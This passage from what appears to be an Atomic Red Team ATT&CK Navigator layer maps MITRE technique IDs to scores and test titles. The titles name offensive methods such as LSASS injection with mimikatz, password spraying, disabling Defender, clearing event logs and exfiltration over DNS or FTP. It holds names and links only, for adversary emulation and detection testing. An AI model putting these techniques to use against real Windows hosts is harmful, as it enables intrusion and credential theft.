Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic 
script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
